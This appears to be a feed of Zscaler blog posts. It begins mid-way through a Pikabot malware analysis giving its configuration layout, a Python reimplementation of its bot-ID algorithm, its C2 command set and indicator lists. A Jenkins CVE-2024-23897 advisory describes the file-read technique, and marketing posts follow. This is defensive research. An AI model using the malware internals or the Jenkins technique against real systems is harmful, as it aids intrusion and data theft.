plaintext in one address. This is a significant drawback since in previous versions, Pikabot decrypted each required element at runtime and only when required. In addition, many of the configuration elements (e.g. command-and-control URIs) were randomized. ANALYST NOTE: Despite their randomization, all configuration elements were valid on the server-side. If a bot sent incorrect information, then it would get rejected/banned by the command-and-control server.The configuration structure is the following:struct configuration { int number_of_swap_rounds_number_of_bytes_to_read_from_end; // During the bot initialization process, this member represents the number of bytes to read from the end of the configuration block. size_t len_remaining_structure; // Size of the remaining structure's data minus the last element wchar_t* bot_minor_version; // E.g. 32-beta. In some samples, this member contains both the major and minor versions of the bot. size_t len_campaign_name; wchar_t* campaign_name; size_t len_unknown_registry_key_name; wchar_t* unknown_registry_key_name; // Used only in the network command 0x246F. size_t len_user_agent; wchar_t* user_agent; size_t number_of_http_headers; wchar_string request_headers[number_of_http_headers]; int number_of_cnc_uris; wchar_string cnc_uris[number_of_cnc_uris]; int number_of_cncs; cnc cns[number_of_cns]; int beacon_time_ms; int delay_time_ms; int delay_seed_mul; // Multiplies this value with the calculated value of the operation - delay_seed_mul * 1000. int maximum_cnc_connection_attempts; size_t len_bot_version // major version + minor version wchar_t* major_version; // 1.8. int len_remaining_bytes_to_read; // Added to the first member and shows how many more bytes to read right after `len_remaining_structure` }; struct wchar_string { size_t length; wchar_t* wstring; }; struct cnc { size_t len_cnc; wchar_t* cnc; int cnc_port; int connection_attempts; bool http_connection_settings; };Once Pikabot parses the plaintext configuration, it erases it by setting all bytes to zero. We assess that this is an anti-dumping method to avoid automating the extraction of the configuration.Lastly, Pikabot loads any remaining required Windows API functions and generates a bot identifier for the compromised host. The algorithm is similar to previous versions and can be reproduced with the following Python code.def checksum(input: int) -> int: return (0x10E1 * input + 0x1538) & 0xffffffff def generate_bot_id_set_1(host_info: bytes, volume_serial_number: int) -> int: for current_character in host_info.lower(): volume_serial_number *= 5 volume_serial_number += current_character bot_id_part_1 = checksum(volume_serial_number & 0xffffffff) return bot_id_part_1 def generate_bot_id_set_2(volume_serial_number: int) -> int: bot_id_part_2 = checksum(volume_serial_number) bot_id_part_2 = checksum(bot_id_part_2) return bot_id_part_2 def generate_bot_id_set_3(bot_id_part_2: int) -> int: out = [] for i in range(8): bot_id_part_2 = checksum(bot_id_part_2) out.append(bot_id_part_2 & 0xff) out = bytes(out[-4:]) return int.from_bytes(out, byteorder='little') host_info = b"username|hostname" volume_serial_number = int("",16) bot_id_part_1 = generate_bot_id_set_1(host_info, volume_serial_number) bot_id_part_2 = generate_bot_id_set_2(volume_serial_number) bot_id_part_3 = generate_bot_id_set_3(bot_id_part_2) bot_id = f"{bot_id_part_1:07X}{bot_id_part_2 & 0xffff:09X}{bot_id_part_3}"ANALYST NOTE: In some samples, Pikabot does not read the volume serial number due to a bug in their code that causes a failure when calling GetVolumeInformationW.Network communicationsPikabot contacts the command-and-control server to request and receive network commands. In this version, the network protocol has considerably changed. Pikabot starts by registering the compromised host to its server. First, Pikabot collects information from the compromised host, such as:Monitor’s display settingsWindows versionHostname/username and operating system’s memory sizeBeacon and delay settingsProcess information such as the process ID, parent process ID and number of threads (see the description of network command 0x985 for a comprehensive list).Bot’s version and campaign nameName of the domain controllerThen Pikabot appends the following information to the registration packet:32-bytes network RC4 key (unique per host), which remains the same for the session. In previous versions, Pikabot was using AES-CBC with a random key/IV per request.Unknown registry key name. We observed it used only in the network command with ID 0x246F.Number of swap rounds used for encoding the data. This remains the same for the rest of the session.Next, Pikabot encrypts the data using the RC4 algorithm, encodes the encrypted output, picks a random URI from its list, and sends the data with a POST request to the command-and-control server.The encoding involves bytes swapping for N times, where N is a randomly generated number in the range 0-25.ANALYST NOTE: Despite the fact that a round number is set in the configuration (see the configuration structure), this value is ignored and Pikabot replaces it with a random value. Moreover, Pikabot has completely removed the JSON format in its network packets and inserts everything in a raw format.If the bot registration is successful, Pikabot starts an infinite loop to request and execute commands. Each incoming network command (with the exception of network command with ID 0x164) has a task ID that is placed at the start of the (decrypted) packet as a QWORD value. In Table 1 below, we list the identified network commands along with a description of their functionality.Command IDDescription0x164Requests command from command-and-control server. The packet includes the command ID, size of bot ID, and the bot ID. The server replies with the same command ID if there is no network command for the bot to execute.0x555Reports the output of the executed network command to the command-and-control server.0x1291Registers the bot. An unknown integer value (0x1687) is appended in the packet at offset 8.0x1FEDUpdates beacon time.0x1A5ATerminates/kills the bot.0x2672Not implemented0x246FWrites a file to disk and adds registry data using the value name specified in the configuration (unknown_registry_key_name).0xACBExecutes the system command and sends back the output. Includes the error code 0x1B3 if there is no output.0x36CInjects the code of a downloaded PE file. The target process information is specified in the network packet.0x792Injects the code of a downloaded shellcode. The target process information is specified in the network packet.0x359Executes system command and sends back the output.Note: Same as 0xACB but does not send the error code.0x3A6Executes system command and sends back the output.Note: Same as 0xACB but does not send the error code.0x240Executes system command and sends back the output.Note: Same as 0xACB but does not send the error code.0x985Collects processes’ information. These are:Executable's filenameProcess IDBoolean flag, which indicates if it is a Pikabot process.Boolean flag, which indicates if Pikabot can access the process with all possible access rights.Number of threadsBase priority of threadsProcess architectureParent process ID0x982Not implementedTable 1. Pikabot Network CommandsConclusion Despite its recent inactivity, Pikabot continues to pose a significant cyber threat and is in constant development. However, the developers have decided to take a different approach and decrease the complexity level of Pikabot's code by removing advanced obfuscation features. Moreover, based on our code analysis, it appears that certain features and network commands have not been implemented yet and are still a work in progress. Zscaler ThreatLabz continues to track this threat and add detections to protect our customers. Indicators Of Compromise (IOCs) SHA256 Description 555687ca3149e23ee980a3acf578e0572da556cf34c87aecf48596834d6b496f Pikabot sample (version 1.8.32-beta) ca5fb5814ec62c8f04936740aabe2664b3c7d036203afbd8425cd67cf1f4b79d Pikabot sample (version 1.8.32-beta) IOC Description 104.129.55[.]103:2224 Command-and-Control server 178.18.246[.]136:2078 Command-and-Control server 158.220.80[.]167:2967 Command-and-Control server 104.129.55[.]104:2223 Command-and-Control server 23.226.138[.]161:5242 Command-and-Control server 37.60.242[.]85:9785 Command-and-Control server 23.226.138[.]143:2083 Command-and-Control server 37.60.242[.]86:2967 Command-and-Control server 85.239.243[.]155:5000 Command-and-Control server 158.220.80[.]157:9785 Command-and-Control server 65.20.66[.]218:5938 Command-and-Control server 95.179.191[.]137:5938 Command-and-Control server 139.84.237[.]229:2967 Command-and-Control server Zscaler Coverage In addition to sandbox detections, Zscaler’s multilayered cloud security platform detects indicators related to Pikabot at various levels with the following threat names: Win32.Trojan.PikaBot Win32.Downloader.PikaBot Mon, 12 Feb 2024 10:11:52 -0800 Nikolaos Pantazopoulos https://www.zscaler.com/blogs/security-research/d-evolution-pikabot https://www.zscaler.com/blogs/product-insights/start-your-journey-it-support-beginner-s-guide Navigating the nuances of IT troubleshooting can be challenging, especially if you're just starting out. Our ebook, A Beginner’s Guide to Troubleshooting Devices, Networks, and Applications for Service Desk Teams, breaks down the essentials of IT support in a clear, digestible format, making it a great resource for newcomers who are eager to become influential service desk team members. It’s a practical guide even for those with limited time. Whether you're dealing with device issues, network complexities, or application troubleshooting, you’ll find step-by-step instructions that are easy to follow even with minimal IT knowledge. We’ve designed this guide to help you enhance your troubleshooting skills, gain the confidence you need to master IT problem-solving, and become a valuable asset to any service desk team. In this ebook, you'll find: An overview of service desk challenges: Understand the evolving IT landscape and the pivotal role of IT support in maintaining productivity. Step-by-step ticket resolution processes: Learn how to handle and resolve IT issues, enhancing customer satisfaction efficiently. Categorization of IT issues: Familiarize yourself with common problems in devices, networks, and applications, along with strategies to tackle them. A focus on device, networking, and application issues: Gain insights into specific challenges in these areas and learn practical solutions. Strategies to enhance troubleshooting workflows: Discover how to streamline IT support processes and use advanced technologies for better problem-solving. It’s also an excellent tool for service desk managers to expedite team onboarding. By equipping your team with this resource, you’ll enable them to handle a wide range of IT issues independently. It reduces the need for escalations and empowers analysts to solve problems efficiently. Ultimately, it can help not only enhance your service desk team’s capabilities, but also significantly shorten the time it takes for new analysts to become proficient. Download the ebook today and transform your service desk team! Fri, 09 Feb 2024 19:14:07 -0800 Rohit Goyal https://www.zscaler.com/blogs/product-insights/start-your-journey-it-support-beginner-s-guide https://www.zscaler.com/blogs/customer-stories/cushman-wakefield-s-roadmap-consolidating-and-simplifying-security-zscaler Cushman & Wakefield’s Roadmap for Consolidating and Simplifying Security with Zscaler As a CISO leading the cybersecurity program at Cushman & Wakefield, one of the world's largest commercial real estate services firms, I can attest that it has been a truly transformative journey. When I joined the company over five years ago, I had clear priorities: improve SaaS application performance for our distributed, mostly mobile workforce, now more than 52,000 employees, simplify network architecture, and accelerate integration of mergers and acquisitions (M&As). My vision was to evolve Cushman & Wakefield’s security approach from a legacy on-premises infrastructure to cloud-based security as a service. As we set our sights on a cloud-first and partner-first model, we aimed to shrink the size and number of our data centers. Our intent was to streamline our infrastructure and build a coordinated security ecosystem with an eye toward gaining operational efficiencies. Equally important was providing our globally dispersed users with faster, more secure access to the more than 200 SaaS applications they rely on every day. To achieve these goals, we turned to the Zscaler Zero Trust Exchange—and it has proven to be the perfect fit for our strategic vision. Zscaler has been at the core of our success and continues to be at the center of our ongoing security transformation journey. A phased approach to our Zscaler implementation In 2019, we made a strategic decision to adopt SD-WAN to improve SaaS connectivity across our more than 400 branch offices. That’s when we adopted Zscaler. We selected Zscaler Internet Access (ZIA), part of the Zero Trust Exchange, as our security solution because it interoperates seamlessly with the SD-WAN and enables secure local internet breakouts without the high costs and complexity of on-premises firewall appliances. The joint solution provided consistent protection and significantly better performance for our users on any device anywhere. Additionally, our security team had complete visibility over what was happening on the network and who was using which applications. This allowed us to manage bandwidth and prioritize traffic to business-critical applications and limit the impact of streaming and social media traffic. We’re continuing to modernize our branch offices but are moving to a café model, where users can securely connect to corporate resources without VPN or SD-WAN. Zscaler is making this change possible. Looking ahead, we also plan to implement Zscaler Private Access more broadly to provide secure access to private applications as we establish offices in new regions. Following the user during the pandemic and beyond At every stage of our implementation, we found that Zscaler delivered value in new ways. Even before the COVID-19 pandemic, a significant portion of our workforce was operating remotely. When the pandemic struck, we were well prepared. Zscaler Client Connector had already been deployed on all devices, so we maintained business continuity. When a leader asked me what my plan was for security at the time, I just shrugged my shoulders and informed him that we already had all our bases covered with Zscaler and Crowdstrike being the primary components. Zscaler integrations for a coordinated security ecosystem After the positive experience we had with the Zscaler integration, we are impressed with how easy and seamless it is to integrate other tools in our security stack with Zscaler. Recently, we integrated Zscaler with CrowdStrike for an added layer of protection: Zscaler only allows devices that meet CrowdStrike’s Zero Trust Assessment (ZTA) score threshold to access sensitive applications. By sharing real-time threat intelligence, data alerts, and device health information, the Zscaler-CrowdStrike integration has reduced the number of security events. As we move forward with building out our zero trust architecture and creating a unified security ecosystem, we plan to leverage Zscaler’s open API more fully to maximize our other security investments. We’re looking at ways to broaden threat intelligence sharing, gain more visibility, and engage automation to a greater degree. At the top of my to-do list are integrating with CrowdStrike Falcon LogScale, its next-generation SIEM and log management tool, and with Mimecast, the cloud-based email security and management system used by all our employees.. Future focus: expanding Zscaler capabilities Risk management I also look forward to evaluating the new AI-powered capabilities like Zscaler Risk360 to gain visibility into risk in all areas of our environment. Once it’s in place, Zscaler Risk360’s visualization framework will generate risk posture profiles using real data in our environment combined with global security research from Zscaler ThreatLabz. The ability to quickly identify and respond to critical vulnerabilities will enhance our proactive protection, enable us to communicate security priorities in a quantifiable way, and help us build a data-driven case as we advocate for additional resources. M&A integration Over the years, most of our growth has been fueled by M&As. We plan on leveraging Zscaler to integrate acquired companies and enable these new users to have access to business-critical applications in days rather than months. Combating data loss and insider threats We are also on a mission to curb data loss overall and to combat insider threats, whether due to negligence or malicious motives. These challenging tasks are made easier with the multi-pronged defense made possible by the zero trust architecture we have in place and continue to build on. By ensuring least privilege access and preventing lateral movement, we are limiting potential damage from abuse of insider access. The Zscaler’s Zero Trust Exchange plays a critical role in keeping these threats at bay by minimizing the attack surface—users connect only to a single application, not to the network. As we continue on our zero trust journey, enhancing data protection in this age of generative AI engines like ChatGPT is a top priority. Zscaler’s inline TLS/SSL traffic inspection will be essential for preventing the leakage of sensitive data by identifying and blocking attempted unauthorized uploads to AI tools and across all our cloud apps. Gaining deeper visibility into user activity is another focus area. While most of our employees are trusted, honest professionals, mistakes happen. By implementing deception tools such as honeypots and lures, our security team will receive alerts to help them detect anomalous insider behavior faster. This significantly reduces dwell time for any potential incidents. A partnership for the long haul As CISO, my aim is to continue delivering seamless access and robust security for our global staff as we grow our business and expand our presence and offer new services. The flexible, scalable Zero Trust Exchange aligns with this goal. Our partnership with Zscaler has been integral to Cushman & Wakefield’s cloud-first journey. Together, we’ve shifted from legacy networks to a unified, user-centric security model that enables productivity and protection anywhere. I am confident that our journey toward a more secure and efficient future will continue successfully with Zscaler as our trusted partner. The results we have achieved thus far speak for themselves. To learn more, read the case study. Thu, 15 Feb 2024 08:37:55 -0800 Erik Hart https://www.zscaler.com/blogs/customer-stories/cushman-wakefield-s-roadmap-consolidating-and-simplifying-security-zscaler https://www.zscaler.com/blogs/customer-stories/how-zscaler-s-powerful-integrations-help-state-oklahoma-efficiently-do-more How Zscaler’s Powerful Integrations Help the State of Oklahoma Efficiently Do More with Less On any given day, our team of security professionals who comprise the OMES Oklahoma Cyber Command stay on top of up to 17 million potential threats ranging from phishing and credential compromise to ransomware and data breaches. Dedicated to securing the digital assets of the State of Oklahoma government, these members are also stewards of massive amounts of sensitive personal and healthcare data—from our more than 30,000 employees and the nearly 4 million state residents served by our more than 180 agencies. Thanks to the Zscaler Zero Trust Exchange platform, we are successfully managing this high volume of threats and safeguarding the vital data we have been entrusted with. One of the Zscaler superpowers we have come to rely on is its integration capabilities. By working in sync with other components of our security stack, Zscaler has taken us to the next level of our security maturity and zero trust transformation. Keep pace by unifying security We know that the spiraling volume of threats will always be a challenge, especially now that cybercriminals are beginning to leverage AI for malicious purposes. When new security challenges emerge, we need to be able to respond at lightning speed. Amid all the change and complexity in the security and technology landscape, I’m finding that the solution is to simplify and unify our security infrastructure. One of the ways we have done that is by taking full advantage of Zscaler’s powerful integration capabilities. When you work with a single unified platform, it almost forces efficiency, and it certainly aids in the ongoing battle most state governments face of having to do more with less. Integrations provide a holistic view One of the things that differentiates Zscaler from other solutions is its open application programming interface (API), which has made it easy to integrate with our existing security solutions. In our environment, we’ve found that Zscaler plays well with other core tools we rely on—namely CrowdStrike and Splunk—in how it shares threat intelligence data and coordinates protection and incident response. The ability to tie these security tools together increases telemetry and gives us the opportunity to stop lateral threats before they become bigger problems that could potentially affect our users and our citizens. Zscaler-CrowdStrike integration curbs lateral threat movement By sharing telemetry and threat intelligence data between the CrowdStrike platform and the Zscaler Zero Trust Exchange, access policies can automatically be adapted according to changing user context, device health, and newly detected threats, making investigation and response faster and more effective. For example, let’s say we know there’s an attack occurring—maybe the next SolarWinds or a user just installed a new, unauthorized app that has weakened the endpoint posture. With the Zscaler-CrowdStrike integration, CrowdStrike can detect the change and recalculate the Falcon Zero Trust Assessment (ZTA) score and share it with Zscaler. Based on the updated ZTA score, Zscaler policy control can automatically adapt to a stricter threshold to only allow access via a browser isolation session or even block the connection to protect against access to selected mission-critical applications. Furthermore, the sharing of telemetry and threat intelligence is key to expanded visibility of the threat landscape, from endpoint to applications. After all, it wouldn’t be efficient if one security system knows something is critically important and doesn’t share this with another security domain! As an inline security cloud, Zscaler can intercept any unknown zero-day payloads before they reach an endpoint and share the telemetry with CrowdStrike. This helps us quickly assess the existence of any such zero-day payload in the entire endpoint environment and provides the basis for automated cross-platform response workflow. This helps stop threats from moving laterally into critical systems, such as a database server housing financial information. Zscaler-Splunk integration provides a centralized view The Zscaler-Splunk integration gives us extensive analytics for in-depth visibility into usage, access, and the overall environment. The analytics correlate data, helping us perform proactive threat hunting and investigations by enabling us to identify abnormal patterns. Zscaler’s data logs correspond to the same schema as Splunk, so it makes correlation searches easy. Zscaler logs are sent via a secure HTTPS push and delivered to Splunk’s HTTP Event Collector reliably and securely. Once in Splunk, the logs are normalized, which allows correlation across all data sources, providing end-to-end visibility. Splunk’s robust analytics include risk-based alerting (RBA) and user and entity behavior analytics (UEBA). The tight integration simplifies security operations by reducing the need for our team to constantly swivel from one security console to another to get the information they need. The Splunk analytics dashboard serves as the hub of this wheel of zero trust protection. It shows activity across the enterprise in real time, regardless of user location. As a result of the Zscaler-Splunk integration, our security operations team has experienced significant gains in speed and efficiency. In the past, I would have needed three to five different solutions to accomplish what Zscaler and its integrations can do on their own. We would not be as far along our path to zero trust as we are now without a platform like the Zscaler Zero Trust Exchange to help us out. It has exponentially improved our cybersecurity, and I’m proud to be a part of the amazing things that my team does every day to protect our employees and our citizens. Read the case study to learn more about the State of Oklahoma’s Zscaler Zero Trust Exchange deployment. Thu, 08 Feb 2024 16:11:39 -0800 Michael Toland https://www.zscaler.com/blogs/customer-stories/how-zscaler-s-powerful-integrations-help-state-oklahoma-efficiently-do-more https://www.zscaler.com/blogs/company-news/now-and-next-how-zscaler-transforming-fuel-channel-success Looking back at 2023, it was impossible to escape the constant buzz surrounding cybersecurity incidents in the market. But amid the chaos, one thing became clear: the cybersecurity market was booming and the role of leaders and partners in ensuring customer safety was crucial. The same still rings true in 2024. As the cyber security market continues to evolve, Zscaler is proud to be at the forefront of innovation, and now, we’ve put the programs in place to allow our partners thrive in this digital era alongside us. Both for what’s now… and what’s next. As we step into the second half of Zscaler’s fiscal year, we’re proud to showcase to partners the army of new opportunities we’ve designed to grow their business, maximize earnings, and elevate their skills. This includes a revamped incentive structure and new selling motions that empower partners with more collaborative selling opportunities throughout the sales cycle to deliver the greatest customer experience in their journey to digital transformation. We have transformed our partnering foundation to provide comprehensive support throughout the customer lifecycle. You’ve probably heard me say it before, zero trust is a team sport. In the 1H half of the year, we took on both an internal and external transformation to ensure that we have purposeful alignment, process, and engagement with our partners throughout the customer lifecycle. This means, from the earliest stages of our world-class sales process to the final delivery, our partners are integrated every step of the way, embedding their services and support to help our customers transition from legacy appliances to a true zero trust model. We’re leading the charge with the market-leading platform, and now the most lucrative incentive framework, in the market today. With the most comprehensive platform in the market today, Zscaler leads the charge. And now, we have introduced the most lucrative incentive framework to match. Over the past six months, my team and I hit the road to listen to our partners and understand what they truly desire in a partnership. One thing stood out loud and clear: they want to work with vendors who offer the most comprehensive security platform and drive profitability. That's why we have enhanced our incentives framework and channel-led selling motion, offering larger payouts, increased discount advantages, and performance bonuses. We want our partners to earn more and thrive in the cloud security market, establishing themselves as trusted advisors. As the digital landscape continues to evolve, Zscaler remains dedicated to supporting partners in driving customer success and achieving mutual growth. We’re empowering our partners to thrive in the cloud security market and establish themselves as trusted advisors. We know that for Zscaler and our partners alike, our number one commitment is driving customer success in the ever-evolving digital era. That’s why Zscaler not only continues to innovate its cloud security offerings to address emerging threats and challenges, but in the first half of our year, we simplified our certifications to help our partners become experts and build practices around zero trust. We also launched targeted enablement around Zscaler-powered customer outcomes to help our partners lead the way as trusted advisors to our customers. But our journey is far from over. As we enter the second half of our fiscal year, we have more exciting announcements lined up to fuel partner success. We will introduce new offerings and specializations to help partners seamlessly integrate Zscaler into their practices. We will optimize our collaborative partnering approach and launch industry-leading tools to make Zscaler the easiest to do business with in the industry. We’ll also continue to be in the field with you each and every day, to make sure our valued partners have the support to deliver transformational outcomes to our customers. We have achieved a lot in the first half of the year with your feedback and support throughout this transformative journey. We are fully dedicated to supporting our partners in reaching their maximum potential with Zscaler, both with what’s now and what’s next. Together, we are changing the channel and revolutionizing the cybersecurity market. Thu, 08 Feb 2024 05:00:02 -0800 Karl Soderlund https://www.zscaler.com/blogs/company-news/now-and-next-how-zscaler-transforming-fuel-channel-success https://www.zscaler.com/blogs/security-research/jenkins-arbitrary-file-leak-vulnerability-cve-2024-23897-can-lead-rce Introduction Jenkins, a Java-based open-source automation server widely used by developers for application building, testing, and deployment, has issued an advisory about a critical vulnerability that could potentially enable remote code execution (RCE). This vulnerability, identified as CVE-2024-23897, poses a high risk and affects Jenkins integrated command line interfaces (CLI). With a CVSS score of 9.8, unauthorized access to files through the CLI is possible, potentially leading to RCE. In addition to file access, CVE-2024-23897 can be leveraged to access binary files that contain cryptographic keys utilized for various Jenkins functionalities, albeit with certain limitations. Unauthorized access to this sensitive information can result in: RCE through the exploitation of resource root URLs RCE by manipulating a "Remember me" cookie RCE through stored cross-site scripting (XSS) attacks via build logs RCE by bypassing CSRF protection Decryption of stored secrets in Jenkins Deletion of any item within Jenkins The downloading of Java heap dumps Affected Versions The vulnerability affects Jenkins versions up to 2.441 and LTS (Long-Term Support) versions up to 2.426.2. Technical Details The vulnerability originates from Jenkins' use of the args4j library for parsing command arguments and options on the Jenkins controller during the processing of CLI commands. Originally intended to enhance usability, a specific feature within args4j that replaces a file path preceded by an "@" character with the file's contents has become a significant security issue. This feature is enabled by default and remains unchecked in versions up to 2.441 and LTS 2.426.2. Exploiting this vulnerability allows attackers to read any files on the Jenkins controller file system using the default character encoding of the Jenkins controller process. When Jenkins CLI tool arguments are prefixed with “@”, they are mistakenly interpreted as files that need to be opened to read the arguments. In certain scenarios, lines from these files are inadvertently included in error messages and transmitted to the CLI user. Two Jenkins configuration options pose significant security risks by allowing unauthenticated attackers to impersonate authenticated users. The first option, “Allow users to register,” enables anyone with access to a Jenkins instance to register an account. Additionally, the “Enable anonymous read permission” option grants universal read permissions, allowing any Jenkins user to access and read the entire content of arbitrary files on the Jenkins server when these options are enabled. Figure 1. Jenkins configuration options The figure below is an example taking the first rows of the C:\Users\IEUser\AppData\Local\Temp\JenkinsTest.txt (a random file created on the Jenkins server for demonstration) file using the CLI help command. Figure 2. A demonstration text file created on the Jenkins server There are two ways to invoke this vulnerability: Using Jenkins-cli.jar: This common approach involves utilizing Jenkins-cli.jar, which operates through web sockets or SSH. Specifically, commands such as shutdown, enable-job, help, and connect-node from the Jenkins CLI tool are manipulated to illicitly access and read the content of files on the Jenkins server. The figure below shows the help command running on Jenkins CLI to read a file. Figure 3. Running the help command with Jenkins CLI tool to read the file content on Jenkins The figure below shows the file content being read from the Jenkins server. Figure 4: File content read from the Jenkins server Sending POST requests: An alternative method is to send two POST requests to http://jenkins/cli?remoting=false. This technique requires the use of a downloader and an uploader. The downloader fetches the response of the CLI command, while the uploader executes a specified CLI command provided in the body of the request. The connection between the downloader and uploader is established by utilizing the UUID from the session header. Figure 5. Attack workflow demonstrating malicious HTTP request Recommendations To mitigate this vulnerability, upgrade to at least Jenkins versions 2.442 and LTS 2.426.3. This patch disables the command parser feature responsible for the vulnerability. Those unable to immediately update to Jenkins 2.442 and LTS 2.426.3 should disable access to the Jenkins CLI, as this is expected to prevent exploitation. For instructions, see the documentation for this workaround. Zscaler Coverage The Zscaler ThreatLabZ team has deployed protection. Zscaler Advanced Threat Protection: APP.EXPLOIT.CVE-2024-23897 References CVE-2024-23897 (CVSS 9.8): Critical Jenkins Security Vulnerability, RCE Possible Jenkins Security Advisory 2024-01-24 CVE-2024-23897.py poc.py - binganao/CVE-2024-23897 · GitHub RCE Jenkins CVE-2024–23897. Background Story | by Syed Abeer Ahmed Jenkins 2.441 / LTS 2.426.3 Arbitrary File Read ≈ Packet Storm Tue, 06 Feb 2024 15:44:05 -0800 Avinash Kumar https://www.zscaler.com/blogs/security-research/jenkins-arbitrary-file-leak-vulnerability-cve-2024-23897-can-lead-rce https://www.zscaler.com/blogs/product-insights/iot-ot-predictions-2024 How many smart home devices are you running where you live? Smart speakers, thermostats, cameras, light bulbs, etc. Have you lost count yet? You could be forgiven, because Forbes projects there could be as many as 207 billion of these devices out in the world by the end of this year! By my calculation that works out to more than 25 devices for every human on the planet! In this blog, we’ll cover some of the top IoT/OT predictions for 2024, covering everything from AI at the edge to ransomware. Let’s jump in. IoT/OT devices will see a higher degree of proliferation than ever before Losing count of how many devices you have isn’t just a nuisance in the workplace; it’s a very real problem, particularly from a cybersecurity perspective. The challenge of keeping track of your IoT devices—not to mention keeping them secure—is only going to grow harder with the proliferation of sensors, monitors, point-of-sale, and myriad other devices that are feeding our hunger for data. Fortunately we’ve been working on that. Edge AI will make these devices smarter, faster No predictions blog post for 2024 would be complete without mention of the topic on everyone’s lips: artificial intelligence. Edge AI is already finding its way onto some smartphones, and as the technology advances, its inclusion in IoT/OT is inevitable. It will only improve as time passes, increasing the number of autonomous decisions being made without oversight. This can easily be positioned as a benefit, especially in remote locations where humans cannot or do not want to be, but it can also be a risk, if mishandled. 5G and other WAN connectivity will evolve to meet the needs of IoT/OT It seems we’ve been hearing about 5G forever, but it’s now starting to truly gain traction in the workplace as a new way to connect devices via the internet with minimal latency and without requiring a local network infrastructure. And it’s not alone—newer versions of the Wi-Fi standard, LPWAN, and even satellite connectivity are also coming to the forefront. This simply means we’re able to deploy sensors and other kinds of IoT devices into more locations, including remote and mobile ones, growing the number of potential use cases for the technology. Digital twins will still serve as proving grounds The accelerated growth in the number of sensors continues to cultivate the use of digital twins; virtual representations of the world around them that help us visualize and improve remote systems. Once again, the proliferation of IoT sensors will provide an even richer and more accurate view of what we’re monitoring. This will enable us to drive resource optimization and efficiency, and pave the way for the adoption of more sustainable systems. Taking all of these developments in aggregate, it’s plain to see that when it comes to IoT and OT growth, ‘we ain’t seen nothing yet’! As with all technological advances, there’s the potential that they will make our lives better and businesses more efficient and profitable. At the same time, it’s vital to ensure security is consideration number one when it comes to planning their deployment, especially when it comes to devices that talk to the internet. This brings us to the flip side of these predictions: the challenges they pose. Data privacy The combination of ubiquitous sensors and the rise of AI making use of the data they collect naturally leads us to consider data privacy. Regulations around the world, perhaps most famously the EU’s GDPR, ensure that privacy is a requirement rather than a consideration. The handling of potentially sensitive data is strictly controlled, and its misuse can significantly undermine public confidence, not to mention lead to potentially huge fines. Never is this a greater problem than when such data is leaked or exfiltrated from its owner for potentially nefarious uses. Ransomware on the (continued) rise As the Zscaler ThreatLabz team recently reminded us, ransomware attacks have risen sharply over the past year, over 37% in fact. At the same time, it’s becoming easier than ever to launch such attacks, aided by readily available AI and Ransomware-as-a-Service (RaaS) kits. The firmware problem Remember earlier when I asked you if you knew how many devices you have deployed? Here’s another one for you. Of those devices, how many of them have their firmware up to date? Do you even know what firmware they’re running to be able to establish this? An IoT device may have been secure on the day it shipped, but as our own computers and smartphones have taught us, regular updates are a fact of life in the cat-and-mouse game of vulnerability. A single compromised device could be all an attacker needs to begin their hunt for more damage to cause or data to steal. The ongoing risks presented by legacy security As the cybersecurity industry continues to incessantly point out, traditional security technology practices, many still employed by IT departments around the world, are fundamentally flawed. The ongoing use of firewalls and VPNs opens the door for lateral movement across networks and geographical boundaries, allowing bad actors the opportunity to reach the countless IoT/OT devices in use. Once the network is compromised, the bounty for an attacker grows ever larger. All of these challenges and more point to only one conclusion: Organizations must adopt a zero trust security architecture in order to protect the IoT and OT devices they will inevitably deploy this year. Conclusion On the one hand, the predictions for IoT/OT in 2024 are worth getting excited about. Our world is getting smarter, and advances in devices will no doubt help us drive improvements in our personal and professional lives. But to benefit positively we must put security first. This doesn’t mean adding more and more roadblocks on the network highways. It means reimagining security and building a framework based on the tenets of zero trust. If you’re new to zero trust and want to learn more, we’d like to welcome you to one of our monthly introductory live webinars where you can explore the many benefits of zero trust and why Zscaler delivers it better than anyone else. Click here and search ‘start here’ to find the next session to sign-up for. Tue, 06 Feb 2024 01:00:02 -0800 Simon Tompson https://www.zscaler.com/blogs/product-insights/iot-ot-predictions-2024